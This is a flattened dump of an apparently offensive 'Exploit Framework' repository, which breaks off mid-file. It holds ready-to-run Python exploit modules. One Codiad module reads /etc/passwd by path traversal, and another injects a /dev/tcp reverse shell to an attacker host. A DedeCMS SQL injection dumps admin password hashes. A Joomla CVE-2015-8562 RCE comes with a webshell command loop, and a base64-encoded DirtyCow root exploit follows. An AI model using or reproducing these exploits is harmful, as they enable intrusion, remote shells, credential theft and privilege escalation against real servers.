sponsor. Your logo will show up here with a link to your website. [[Become a sponsor](https://opencollective.com/Exploit-Framework#sponsor)] 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | -------------------------------------------------------------------------------- /core/banner/banner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | def banner(): 5 | print("===================================================") 6 | print("| Exploit Framework (v0.0.1) |") 7 | print("| https://github.com/wangyihang/exploit-framework |") 8 | print("===================================================") 9 | 10 | if __name__ == "__main__": 11 | banner() 12 | -------------------------------------------------------------------------------- /core/log/Log.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | from core.log import color 5 | import sys 6 | 7 | class Log(): 8 | @staticmethod 9 | def _print(word): 10 | sys.stdout.write(word) 11 | sys.stdout.flush() 12 | 13 | @staticmethod 14 | def info(word): 15 | Log._print("[+] %s\n" % color.lightPurple(word)) 16 | 17 | @staticmethod 18 | def warning(word): 19 | Log._print("[!] %s\n" % color.yellow(word)) 20 | 21 | @staticmethod 22 | def error(word): 23 | Log._print("[-] %s\n" % color.red(word)) 24 | 25 | @staticmethod 26 | def success(word): 27 | Log._print("[+] %s\n" % color.purple(word)) 28 | 29 | @staticmethod 30 | def query(word): 31 | Log._print("[?] %s\n" % color.underline(word)) 32 | 33 | @staticmethod 34 | def context(context): 35 | Log._print("[%s]" % (color.red(context))) 36 | -------------------------------------------------------------------------------- /core/log/color.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/envpython 2 | #encoding):utf-8 3 | 4 | def black(string): 5 | return'\033[30m'+string+'\033[0m' 6 | 7 | def blue(string): 8 | return'\033[94m'+string+'\033[0m' 9 | 10 | def gray(string): 11 | return'\033[1;30m'+string+'\033[0m' 12 | 13 | def green(string): 14 | return'\033[92m'+string+'\033[0m' 15 | 16 | def cyan(string): 17 | return'\033[96m'+string+'\033[0m' 18 | 19 | def lightPurple(string): 20 | return'\033[94m'+string+'\033[0m' 21 | 22 | def purple(string): 23 | return'\033[95m'+string+'\033[0m' 24 | 25 | def red(string): 26 | return'\033[91m'+string+'\033[0m' 27 | 28 | def underline(string): 29 | return'\033[4m'+string+'\033[0m' 30 | 31 | def white(string): 32 | return'\033[0m'+string+'\033[0m' 33 | 34 | def white_2(string): 35 | return'\033[1m'+string+'\033[0m' 36 | 37 | def yellow(string): 38 | return'\033[93m'+string+'\033[0m' 39 | -------------------------------------------------------------------------------- /exploit/codiad/cve_2014_9581.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | 16 | class Exploit: 17 | # 定义该漏洞利用的配置信息 18 | # 备注: 19 | # necessity 表示该参数是否必须配置 20 | # default 为该参数的默认值 21 | config = { 22 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 23 | "remote_port": {"default": 80, "necessity": True}, 24 | "admin_user": {"default": "admin", "necessity": True}, 25 | "admin_pwd": {"default": "admin", "necessity": True}, 26 | "file": {"default": "/etc/passwd", "necessity": True}, 27 | "interactive": {"default": True, "necessity": True} 28 | } 29 | session = requests.Session() 30 | 31 | def __init__(self): 32 | pass 33 | 34 | def login(self): 35 | url = "http://%s:%d/components/user/controller.php?action=authenticate" % (self.get_config("remote_host"), int(self.get_config("remote_port"))) 36 | data = { 37 | "username":self.get_config("admin_user"), 38 | "password":self.get_config("admin_pwd"), 39 | "theme":"default", 40 | "language":"en" 41 | } 42 | response = self.session.post(url, data=data) 43 | content = response.content 44 | print("[+] Login Content : %s" % (content)) 45 | if 'status":"success"' in content: 46 | return True 47 | else: 48 | return False 49 | 50 | def exploit(self): 51 | ''' 52 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 53 | ''' 54 | host = self.get_config("remote_host") 55 | port = self.get_config("remote_port") 56 | file = self.get_config("file") 57 | if not self.login(): 58 | Log.Log.error("Login failed!") 59 | return False 60 | Log.Log.success("Login successful!") 61 | url = "http://%s:%d/components/filemanager/download.php?path=../../../../..%s&type=undefined" % (host, port, file) 62 | try: 63 | response = self.session.get(url) 64 | if response.status_code == 200: 65 | Log.Log.success("Exploit success!") 66 | Log.Log.info(">>>>>> %s <<<<<<" % (file)) 67 | print("%s" % color.blue(response.content)) 68 | return True 69 | else: 70 | return False 71 | except Exception as e: 72 | Log.Log.error(str(e)) 73 | return False 74 | 75 | def show_options(self): 76 | ''' 77 | 输出该模块的选项信息 (即之前定义的 config) 78 | 由 options 命令触发 79 | 通常不需要改动 80 | ''' 81 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 82 | Log.Log.warning("-------\t\t---------\t\t-------") 83 | for key in sorted(self.config.keys()): 84 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 85 | key, self.config[key]["necessity"], self.get_config(key))) 86 | 87 | def set_config(self, key, value): 88 | ''' 89 | value®改 90 | 由 set 命令触发 91 | 通常不需要改动 92 | ''' 93 | if key in self.config.keys(): 94 | self.config[key]["default"] = value 95 | else: 96 | Log.Log.error("No such option!") 97 | 98 | def get_config(self, key): 99 | return self.config[key]["default"] 100 | 101 | def show_info(self): 102 | ''' 103 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 104 | 该函数在模块被加载的时候自动调用 105 | 需要将其中的信息修改为对应的模块信息 106 | ''' 107 | Log.Log.info("Name: Codiad (2.4.3) Any file read (CVE-2014-9581)") 108 | Log.Log.info("Effected Version: <=2.4.3") 109 | Log.Log.info("Author: TaurusOmar") 110 | Log.Log.info("Email: taurusomar13@gmail.com") 111 | Log.Log.info("Twitter: @TaurusOmar_") 112 | Log.Log.info("Home: overhat.blogspot.com") 113 | Log.Log.info("Refer:") 114 | Log.Log.info("\thttps://www.exploit-db.com/exploits/35585/") 115 | 116 | def main(): 117 | ''' 118 | 测试用例 119 | ''' 120 | exploit = Exploit() 121 | exploit.show_info() 122 | exploit.set_config("remote_host", "localhost") 123 | exploit.show_options() 124 | exploit.exploit() 125 | 126 | if __name__ == "__main__": 127 | main() 128 | -------------------------------------------------------------------------------- /exploit/codiad/cve_2017_11366.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | import json 6 | 7 | try: 8 | from core.log import Log 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | 14 | class Exploit: 15 | config = { 16 | "remote_host": {"default": "127.0.0.1", "necessity":True}, 17 | "remote_port": {"default": 80, "necessity":True}, 18 | "local_host": {"default": "8.8.8.8", "necessity":True}, 19 | "local_port": {"default": 8888, "necessity":True}, 20 | "admin_user": {"default": "admin", "necessity":True}, 21 | "admin_pwd": {"default": "admin", "necessity":True}, 22 | } 23 | 24 | session = requests.Session() 25 | 26 | def __init__(self): 27 | pass 28 | 29 | def login(self): 30 | url = "http://%s:%d/components/user/controller.php?action=authenticate" % (self.get_config("remote_host"), int(self.get_config("remote_port"))) 31 | data = { 32 | "username":self.get_config("admin_user"), 33 | "password":self.get_config("admin_pwd"), 34 | "theme":"default", 35 | "language":"en" 36 | } 37 | response = self.session.post(url, data=data) 38 | content = response.content 39 | print("[+] Login Content : %s" % (content)) 40 | if 'status":"success"' in content: 41 | return True 42 | else: 43 | return False 44 | 45 | def get_write_able_path(self): 46 | url = "http://%s:%d/components/user/controller.php?action=get_current" % (self.get_config("remote_host"), self.get_config("remote_port")) 47 | response = self.session.get(url) 48 | content = response.content 49 | print(content) 50 | print("[+] Path Content : %s" % (content)) 51 | json_obj = json.loads(content) 52 | if json_obj['status'] == "success": 53 | return json_obj['data']['path'] 54 | else: 55 | return False 56 | 57 | def get_write_able_path(self): 58 | url = "http://%s:%d/components/project/controller.php?action=get_current" % (self.get_config("remote_host"), self.get_config("remote_port")) 59 | response = self.session.get(url) 60 | content = response.content 61 | print("[+] Path Content : %s" % (content)) 62 | json_obj = json.loads(content) 63 | if json_obj['status'] == "success": 64 | return json_obj['data']['path'] 65 | else: 66 | return False 67 | 68 | def exploit(self): 69 | remote_host = self.get_config("remote_host") 70 | remote_port = self.get_config("remote_port") 71 | 72 | Log.Log.info("Logining...") 73 | if self.login(): 74 | Log.Log.success("Login successfully!") 75 | else: 76 | Log.Log.error("Login failed!") 77 | return False 78 | 79 | Log.Log.info("Getting writable path...") 80 | path = self.get_write_able_path() 81 | if path == False: 82 | Log.Log.error("Get current path error!") 83 | return False 84 | Log.Log.info("Writable Path: %s" % (path)) 85 | 86 | local_host = self.get_config("local_host") 87 | local_port = int(self.get_config("local_port")) 88 | Log.Log.info("Getting reverse shell at %s:%d" % (local_host, local_port)) 89 | 90 | url = "http://%s:%d/components/filemanager/controller.php?action=search&path=%s" % (remote_host, remote_port, path) 91 | payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+local_host+'''%2F'''+str(local_port)+'''+0%3E%261'%0Agrep+%22SniperOJ''' 92 | data = "search_string=Hacker&search_file_type=" + payload 93 | headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} 94 | try: 95 | response = self.session.post(url, data=data, headers=headers, timeout=3) 96 | content = response.content 97 | print(content) 98 | if content == '''{"status":"error","message":"No Results Returned"}''': 99 | Log.Log.error("If your see this message immediately, three reasons:") 100 | Log.Log.error("1. you just haved exit the reverse shell.") 101 | Log.Log.error("2. the target server cannot access your vps server") 102 | Log.Log.error("3. you havn't start listen a port on your vps server (%s:%d), so connection failed." % (self.get_config("local_host"), self.get_config("local_port"))) 103 | except Exception as e: 104 | Log.Log.success(str(e)) 105 | Log.Log.success("Please check your reverse shell at %s:%d" % (self.get_config("local_host"), self.get_config("local_port"))) 106 | 107 | def show_options(self): 108 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 109 | Log.Log.warning("-------\t\t---------\t\t-------") 110 | for key in sorted(self.config.keys()): 111 | Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key))) 112 | 113 | def set_config(self, key, value): 114 | if key in self.config.keys(): 115 | self.config[key]["default"] = value 116 | else: 117 | Log.Log.error("No such option!") 118 | 119 | def get_config(self, key): 120 | return self.config[key]["default"] 121 | 122 | def show_info(self): 123 | Log.Log.info("Name: Codiad(2.8.4) Remote Command Execute (CVE-2017-11366)") 124 | Log.Log.info("Effected Version: <=2.8.4") 125 | Log.Log.info("Author: WangYihang") 126 | Log.Log.info("Email: wangyihanger@gmail.com") 127 | Log.Log.info("Refer:") 128 | Log.Log.info("\thttp://www.jianshu.com/p/41ac7ac2a7af") 129 | Log.Log.info("\thttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11366") 130 | 131 | def main(): 132 | exploit = Exploit() 133 | exploit.show_info() 134 | exploit.set_config("remote_host", "127.0.0.1") 135 | exploit.set_config("local_host", "127.0.0.1") 136 | exploit.set_config("local_port", 5555) 137 | exploit.show_options() 138 | exploit.exploit() 139 | 140 | if __name__ == "__main__": 141 | main() 142 | -------------------------------------------------------------------------------- /exploit/dedecms/dedecms_recommand_php_sql_injection.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | 16 | class Exploit: 17 | # 定义该漏洞利用的配置信息 18 | # 备注: 19 | # necessity 表示该参数是否必须配置 20 | # default 为该参数的默认值 21 | config = { 22 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 23 | "remote_port": {"default": 80, "necessity": True}, 24 | } 25 | # 如果该漏洞可以 GetShell, 该变量存储 shell 的 url 26 | webshell_url = "" 27 | session = requests.Session() 28 | 29 | def __init__(self): 30 | pass 31 | 32 | def exploit(self): 33 | ''' 34 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 35 | ''' 36 | Log.Log.info("Lauching the exploition...") 37 | host = self.get_config("remote_host") 38 | port = int(self.get_config("remote_port")) 39 | url = "http://%s:%d/%s" % (host, port, '''plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294''') 40 | Log.Log.info("Url: %s" % (url)) 41 | try: 42 | response = requests.get(url) 43 | if response.status_code == 200: 44 | content = response.content 45 | if "

" not in content: 46 | Log.Log.error("Exploit Failed!") 47 | return False 48 | data = response.content.split("

")[1].split("

")[0].split("\\|") 49 | if len(data) != 2: 50 | Log.Log.error("Exploit Failed!") 51 | return False 52 | Log.Log.success("Exploit success!") 53 | username = data[0] 54 | password = data[1] 55 | print("%s" % (color.cyan("Username\tHash"))) 56 | print("%s" % (color.blue("%s\t%s" % (username, password)))) 57 | return True 58 | else: 59 | return False 60 | except Exception as e: 61 | Log.Log.error(str(e)) 62 | return False 63 | 64 | def show_options(self): 65 | ''' 66 | 输出该模块的选项信息 (即之前定义的 config) 67 | 由 options 命令触发 68 | 通常不需要改动 69 | ''' 70 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 71 | Log.Log.warning("-------\t\t---------\t\t-------") 72 | for key in sorted(self.config.keys()): 73 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 74 | key, self.config[key]["necessity"], self.get_config(key))) 75 | 76 | def set_config(self, key, value): 77 | ''' 78 | 对模块的参数进行修改 79 | 由 set 命令触发 80 | 通常不需要改动 81 | ''' 82 | if key in self.config.keys(): 83 | self.config[key]["default"] = value 84 | else: 85 | Log.Log.error("No such option!") 86 | 87 | def get_config(self, key): 88 | return self.config[key]["default"] 89 | 90 | def interactive(self): 91 | ''' 92 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 93 | 这里判断了 webshell_url 这个变量是否为空 94 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 95 | ''' 96 | if self.webshell_url == "": 97 | Log.Log.error("Webshell is dead!") 98 | return 99 | while True: 100 | command = input("$ ") 101 | if command == "exit": 102 | break 103 | data = { 104 | self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 105 | } 106 | print(data) 107 | try: 108 | Log.Log.success(self.session.post(self.webshell_url, data=data).content) 109 | except Exception as e: 110 | Log.Log.error(str(e)) 111 | return False 112 | 113 | def show_info(self): 114 | ''' 115 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 116 | 该函数在模块被加载的时候自动调用 117 | 需要将其中的信息修改为对应的模块信息 118 | ''' 119 | Log.Log.info("Name: DedeCms (V5.6) recommend.php SQL injection") 120 | Log.Log.info("Effected Version: <=5.6") 121 | Log.Log.info("Author: 没穿底裤") 122 | Log.Log.info("Home: http://0day5.com/author/1/") 123 | Log.Log.info("Refer:") 124 | Log.Log.info("\thttp://0day5.com/archives/1349/") 125 | 126 | def main(): 127 | ''' 128 | 测试用例 129 | ''' 130 | exploit = Exploit() 131 | exploit.show_info() 132 | exploit.set_config("remote_host", "192.168.187.1") 133 | exploit.set_config("session_id", "b6aia8tltrqtie7h0pjojelml3") 134 | exploit.set_config("shell_pwd", "hacker") 135 | exploit.show_options() 136 | exploit.exploit() 137 | 138 | if __name__ == "__main__": 139 | main() 140 | -------------------------------------------------------------------------------- /exploit/joomla/cve_2015_8562.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | except Exception as e: 9 | import sys 10 | sys.path.append("../../core/log") 11 | from Log import Log 12 | 13 | class Exploit: 14 | config = { 15 | "remote_host": {"default": "127.0.0.1", "necessity":True}, 16 | "remote_port": {"default": 80, "necessity":True}, 17 | "command": {"default": "id", "necessity":True}, 18 | } 19 | webshell_url = "" 20 | 21 | def __init__(self): 22 | pass 23 | 24 | def exploit(self): 25 | remote_host = self.get_config("remote_host") 26 | remote_port = int(self.get_config("remote_port")) 27 | command = self.get_config("command") 28 | url = "http://%s:%d/" % (remote_host, remote_port) 29 | payload = self.generate_payload("system(base64_decode('%s'));" % (command.encode("base64").replace("\n", ""))) 30 | headers = { 31 | 'User-Agent': payload 32 | } 33 | session = requests.Session() 34 | try: 35 | cookies = session.get(url, headers=headers, timeout=3) 36 | response = session.get(url, timeout=10, headers=headers) 37 | except Exception as e: 38 | Log.Log.error(str(e)) 39 | return False 40 | content = response.content 41 | Log.Log.success(content) 42 | return True 43 | 44 | def generate_payload(self, php_payload): 45 | php_payload = php_payload 46 | terminate = '\xf0\x9d\x8c\x86' 47 | exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' 48 | injected_payload = "{};JFactory::getConfig();exit".format(php_payload) 49 | exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) 50 | exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate 51 | return exploit_template 52 | 53 | def show_options(self): 54 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 55 | Log.Log.warning("-------\t\t---------\t\t-------") 56 | for key in sorted(self.config.keys()): 57 | Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key))) 58 | 59 | def set_config(self, key, value): 60 | if key in self.config.keys(): 61 | self.config[key]["default"] = value 62 | else: 63 | Log.Log.error("No such option!") 64 | 65 | def get_config(self, key): 66 | return self.config[key]["default"] 67 | 68 | def show_info(self): 69 | Log.Log.info("Name: Joomla(1.5 < 3.45) HTTP Header Unauthenticated RCE (CVE-2015-8562)") 70 | Log.Log.info("Effected Version: 1.5 < 3.45") 71 | Log.Log.info("Author: Andrew McNicol") 72 | Log.Log.info("GitHub: https://github.com/anarcoder") 73 | Log.Log.info("Refer:") 74 | Log.Log.info('\thttps://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html') 75 | Log.Log.info('\thttps://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html') 76 | Log.Log.info('\thttps://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html') 77 | Log.Log.info('\thttps://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/') 78 | Log.Log.info('\thttps://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330') 79 | Log.Log.info('\thttps://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html') 80 | Log.Log.info('\thttps://bugs.php.net/bug.php?id=70219') 81 | 82 | def main(): 83 | exploit = Exploit() 84 | exploit.show_info() 85 | exploit.set_config("remote_host", "192.168.187.1") 86 | exploit.show_options() 87 | exploit.exploit() 88 | 89 | if __name__ == "__main__": 90 | main() 91 | -------------------------------------------------------------------------------- /exploit/kernel/cve_2016_5195.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import os 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | class Exploit: 16 | # 定义该漏洞利用的配置信息 17 | # 备注: 18 | # necessity 表示该参数是否必须配置 19 | # default 为该参数的默认值 20 | config = { 21 | } 22 | 23 | code = ''' 24 | I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHN5cy9tbWFu 25 | Lmg+CiNpbmNsdWRlIDxmY250bC5oPgojaW5jbHVkZSA8cHRocmVhZC5oPgojaW5jbHVkZSA8c3Ry 26 | aW5nLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KCnZvaWQgKm1hcDsKaW50IGY7CmludCBzdG9wID0g 27 | MDsKc3RydWN0IHN0YXQgc3Q7CmNoYXIgKm5hbWU7CnB0aHJlYWRfdCBwdGgxLHB0aDIscHRoMzsK 28 | CmNoYXIgc3VpZF9iaW5hcnlbXSA9ICIvdXNyL2Jpbi9wYXNzd2QiOwoKLyoKICogKiAkIG1zZnZl 29 | bm9tIC1wIGxpbnV4L3g2NC9leGVjIENNRD0iZWNobyAwID4gL3Byb2Mvc3lzL3ZtL2RpcnR5X3dy 30 | aXRlYmFja19jZW50aXNlY3MmJmNwIC1mIC90bXAvYmFrIC91c3IvYmluL3Bhc3N3ZCYmL2Jpbi9i 31 | YXNoIiBQcmVwZW5kU2V0dWlkPVRydWUgLWYgZWxmIHwgeHhkIC1pCiAqICovCnVuc2lnbmVkIGNo 32 | YXIgc2NbXSA9IHsKICAweDdmLCAweDQ1LCAweDRjLCAweDQ2LCAweDAyLCAweDAxLCAweDAxLCAw 33 | eDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4 34 | MDIsIDB4MDAsIDB4M2UsIDB4MDAsIDB4MDEsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHg3OCwgMHgw 35 | MCwgMHg0MCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHg0MCwgMHgwMCwgMHgwMCwg 36 | MHgwMCwKICAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw 37 | eDAwLCAweDAwLCAweDAwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4NDAsIDB4 38 | MDAsIDB4MzgsIDB4MDAsIDB4MDEsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHgwMCwgMHgwMCwgMHgw 39 | MCwgMHgwMCwgMHgwMSwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwNywgMHgwMCwgMHgwMCwgMHgwMCwK 40 | ICAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw 41 | eDAwLCAweDQwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4 42 | NDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHgwMiwgMHgwMSwgMHgwMCwgMHgw 43 | MCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHg4YywgMHgwMSwgMHgwMCwgMHgwMCwKICAweDAw 44 | LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDEwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw 45 | eDAwLCAweDAwLAogIDB4NDgsIDB4MzEsIDB4ZmYsIDB4NmEsIDB4NjksIDB4NTgsIDB4MGYsIDB4 46 | MDUsIDB4NmEsIDB4M2IsIDB4NTgsIDB4OTksCiAgMHg0OCwgMHhiYiwgMHgyZiwgMHg2MiwgMHg2 47 | OSwgMHg2ZSwgMHgyZiwgMHg3MywgMHg2OCwgMHgwMCwgMHg1MywgMHg0OCwKICAweDg5LCAweGU3 48 | LCAweDY4LCAweDJkLCAweDYzLCAweDAwLCAweDAwLCAweDQ4LCAweDg5LCAweGU2LCAweDUyLCAw 49 | eGU4LAogIDB4NWIsIDB4MDAsIDB4MDAsIDB4MDAsIDB4NjUsIDB4NjMsIDB4NjgsIDB4NmYsIDB4 50 | MjAsIDB4MzAsIDB4MjAsIDB4M2UsCiAgMHgyMCwgMHgyZiwgMHg3MCwgMHg3MiwgMHg2ZiwgMHg2 51 | MywgMHgyZiwgMHg3MywgMHg3OSwgMHg3MywgMHgyZiwgMHg3NiwKICAweDZkLCAweDJmLCAweDY0 52 | LCAweDY5LCAweDcyLCAweDc0LCAweDc5LCAweDVmLCAweDc3LCAweDcyLCAweDY5LCAweDc0LAog 53 | IDB4NjUsIDB4NjIsIDB4NjEsIDB4NjMsIDB4NmIsIDB4NWYsIDB4NjMsIDB4NjUsIDB4NmUsIDB4 54 | NzQsIDB4NjksIDB4NzMsCiAgMHg2NSwgMHg2MywgMHg3MywgMHgyNiwgMHgyNiwgMHg2MywgMHg3 55 | MCwgMHgyMCwgMHgyZCwgMHg2NiwgMHgyMCwgMHgyZiwKICAweDc0LCAweDZkLCAweDcwLCAweDJm 56 | LCAweDYyLCAweDYxLCAweDZiLCAweDIwLCAweDJmLCAweDc1LCAweDczLCAweDcyLAogIDB4MmYs 57 | IDB4NjIsIDB4NjksIDB4NmUsIDB4MmYsIDB4NzAsIDB4NjEsIDB4NzMsIDB4NzMsIDB4NzcsIDB4 58 | NjQsIDB4MjYsCiAgMHgyNiwgMHgyZiwgMHg2MiwgMHg2OSwgMHg2ZSwgMHgyZiwgMHg2MiwgMHg2 59 | MSwgMHg3MywgMHg2OCwgMHgwMCwgMHg1NiwKICAweDU3LCAweDQ4LCAweDg5LCAweGU2LCAweDBm 60 | LCAweDA1Cn07CnVuc2lnbmVkIGludCBzY19sZW4gPSAyNTg7CgoKdm9pZCAqbWFkdmlzZVRocmVh 61 | ZCh2b2lkICphcmcpCnsKICAgIGNoYXIgKnN0cjsKICAgIHN0cj0oY2hhciopYXJnOwogICAgaW50 62 | IGksYz0wOwogICAgZm9yKGk9MDtpPDEwMDAwMDAgJiYgIXN0b3A7aSsrKSB7CiAgICAgICAgICAg 63 | IGMrPW1hZHZpc2UobWFwLDEwMCxNQURWX0RPTlRORUVEKTsKICAgICAgICB9CiAgICBwcmludGYo 64 | InRocmVhZCBzdG9wcGVkXG4iKTsKfQoKdm9pZCAqcHJvY3NlbGZtZW1UaHJlYWQodm9pZCAqYXJn 65 | KQp7CiAgICBjaGFyICpzdHI7CiAgICBzdHI9KGNoYXIqKWFyZzsKICAgIGludCBmPW9wZW4oIi9w 66 | cm9jL3NlbGYvbWVtIixPX1JEV1IpOwogICAgaW50IGksYz0wOwogICAgZm9yKGk9MDtpPDEwMDAw 67 | MDAgJiYgIXN0b3A7aSsrKSB7CiAgICAgICAgICAgIGxzZWVrKGYsbWFwLFNFRUtfU0VUKTsKICAg 68 | ICAgICAgICAgYys9d3JpdGUoZiwgc3RyLCBzY19sZW4pOwogICAgICAgIH0KICAgIHByaW50Zigi 69 | dGhyZWFkIHN0b3BwZWRcbiIpOwp9Cgp2b2lkICp3YWl0Rm9yV3JpdGUodm9pZCAqYXJnKSB7CiAg 70 | ICBjaGFyIGJ1ZltzY19sZW5dOwoKICAgIGZvcig7OykgewogICAgICAgICAgICBGSUxFICpmcCA9 71 | IGZvcGVuKHN1aWRfYmluYXJ5LCAicmIiKTsKCiAgICAgICAgICAgIGZyZWFkKGJ1Ziwgc2NfbGVu 72 | LCAxLCBmcCk7CgogICAgICAgICAgICBpZihtZW1jbXAoYnVmLCBzYywgc2NfbGVuKSA9PSAwKSB7 73 | CiAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ZigiJXMgb3ZlcndyaXR0ZW5cbiIsIHN1aWRf 74 | YmluYXJ5KTsKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAg 75 | ICAgfQoKICAgICAgICAgICAgZmNsb3NlKGZwKTsKICAgICAgICAgICAgc2xlZXAoMSk7CiAgICAg 76 | ICAgfQoKICAgIHN0b3AgPSAxOwoKICAgIHByaW50ZigiUG9wcGluZyByb290IHNoZWxsLlxuIik7 77 | CiAgICBwcmludGYoIkRvbid0IHdvcnJ5LC91c3IvYmluL3Bhc3N3ZCBoYXMgYmVlbiByZXN0b3Jl 78 | ZC5cbiIpOwoKICAgIHN5c3RlbShzdWlkX2JpbmFyeSk7Cn0KCmludCBtYWluKGludCBhcmdjLGNo 79 | YXIgKmFyZ3ZbXSkgewogICAgY2hhciAqYmFja3VwOwoKICAgIHByaW50ZigiRGlydHlDb3cgcm9v 80 | dCBwcml2aWxlZ2UgZXNjYWxhdGlvblxuIik7CiAgICBwcmludGYoIkJhY2tpbmcgdXAgJXMgdG8g 81 | L3RtcC9iYWtcbiIsIHN1aWRfYmluYXJ5KTsKCiAgICBhc3ByaW50ZigmYmFja3VwLCAiY3AgJXMg 82 | L3RtcC9iYWsiLCBzdWlkX2JpbmFyeSk7CiAgICBzeXN0ZW0oYmFja3VwKTsKCiAgICBmID0gb3Bl 83 | bihzdWlkX2JpbmFyeSxPX1JET05MWSk7CiAgICBmc3RhdChmLCZzdCk7CgogICAgcHJpbnRmKCJT 84 | aXplIG9mIGJpbmFyeTogJWRcbiIsIHN0LnN0X3NpemUpOwoKICAgIGNoYXIgcGF5bG9hZFtzdC5z 85 | dF9zaXplXTsKICAgIG1lbXNldChwYXlsb2FkLCAweDkwLCBzdC5zdF9zaXplKTsKICAgIG1lbWNw 86 | eShwYXlsb2FkLCBzYywgc2NfbGVuKzEpOwoKICAgIG1hcCA9IG1tYXAoTlVMTCxzdC5zdF9zaXpl 87 | 